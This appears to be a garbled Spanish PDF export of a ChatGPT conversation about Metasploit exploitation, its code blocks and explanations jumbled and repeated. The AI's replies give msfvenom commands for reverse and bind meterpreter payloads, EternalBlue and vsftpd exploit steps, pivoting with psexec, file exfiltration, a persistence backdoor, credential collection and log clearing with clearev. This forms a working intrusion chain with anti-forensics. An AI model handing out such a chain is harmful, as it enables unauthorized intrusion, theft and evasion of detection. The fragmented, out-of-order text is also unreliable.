ChatGPT Explotacion
ChatGPT Explotacion
ChatGPT Explotacion
reverse, y ejemplificarla
¡Hola! La principal diferencia entre un payload de tipo bind y reverse es
la dirección en la que se establece la conexión.
bashCopy code
msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe > bind_payload.exe
bashCopy code
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe >
reverse_payload.exe
Este comando genera un payload de tipo reverse para una conexión de
meterpreter en Windows que se conecta al sistema con la dirección IP
"192.168.1.100" en el puerto 4444. El archivo de salida se llama
"reverse_payload.exe".
Copy code
msfconsole
sqlCopy code
search vsftpd
arduinoCopy code
set RHOST <dirección_IP_de_metasploitable3>
arduinoCopy code
run
arduinoCopy code
set RHOST <dirección_IP_de_metasploitable3> set FTPUSER <nombre_de_usuario> set FTPPASS
<contraseña>
Una vez que haya configurado las credenciales, puede volver a ejecutar
el exploit con el siguiente comando:
arduinoCopy code
run
sqlCopy code
search eternalblue
bashCopy code
use exploit/windows/smb/ms17_010_eternalblue
arduinoCopy code
set RHOSTS <dirección_IP_de_la_máquina_objetivo> set LHOST
<dirección_IP_de_la_máquina_atacante>
Finalmente, puedes ejecutar el exploit con el comando run :
arduinoCopy code
run
cssCopy code
sessions - i <número_de_sesión>
arduinoCopy code
set FORMAT <formato_de_salida> set OUTPUTFILE <ubicación_del_archivo_de_salida>
arduinoCopy code
run
Copy code
sessions
cssCopy code
sessions - i 1
Una vez que hayas seleccionado la sesión, podrás utilizar los módulos
de post-explotación o cualquier otra función de Metasploit Framework
en esa sesión en particular.
Copy code
msfupdate
bashCopy code
meterpreter > run autoroute -s 10.10.10.0/24 meterpreter > use exploit/windows/smb/psexec meterpreter
> set RHOST 10.10.10.5 meterpreter > set SMBUser usuario meterpreter > set SMBPass contraseña
meterpreter > set PAYLOAD windows/meterpreter/reverse_tcp meterpreter > set LHOST
192.168.1.100 meterpreter > set LPORT 4444 meterpreter > exploit
3. Exfiltrar datos: Si tu objetivo es obtener información confidencial
de la máquina objetivo, puedes utilizar herramientas de
exfiltración de datos para copiar archivos y datos importantes
desde la máquina objetivo a tu máquina de ataque.
bashCopy code
meterpreter > download C:\\ruta\\al\\archivo\\confidencial.txt
/ruta/local/para/guardar/el/archivo/confidencial.txt
4. Plantar puertas traseras: Si deseas mantener el acceso a la
máquina objetivo incluso después de cerrar tu sesión en
Metasploit, puedes intentar plantar puertas traseras en la
máquina objetivo.
bashCopy code
meterpreter > use post/windows/manage/persistence meterpreter > set SESSION 1 meterpreter > set
PAYLOAD windows/meterpreter/reverse_tcp meterpreter > set LHOST 192.168.1.100 meterpreter >
set LPORT 4444 meterpreter > run
5. Limpiar tus huellas: Es importante que elimines cualquier
evidencia de tu presencia en la máquina objetivo para evitar ser
detectado o rastreado.
Copy code
meterpreter > clearev
bash
Copy code
msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe >
bind_payload.exe
Este comando genera un payload de tipo bind para una conexión de
meterpreter en Windows que escucha en el puerto 4444. El archivo de salida
se llama "bind_payload.exe".
bash
Copy code
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100
LPORT=4444 -f exe > reverse_payload.exe
Este comando genera un payload de tipo reverse para una conexión de
meterpreter en Windows que se conecta al sistema con la dirección IP
"192.168.1.100" en el puerto 4444. El archivo de salida se llama
"reverse_payload.exe".
cssCopy code
sessions - i <número_de_sesión>
bashCopy code
use post/windows/gather/credentials/credential_collector
arduinoCopy code
set FORMAT <formato_de_salida> set OUTPUTFILE <ubicación_del_archivo_de_salida>
arduinoCopy code
run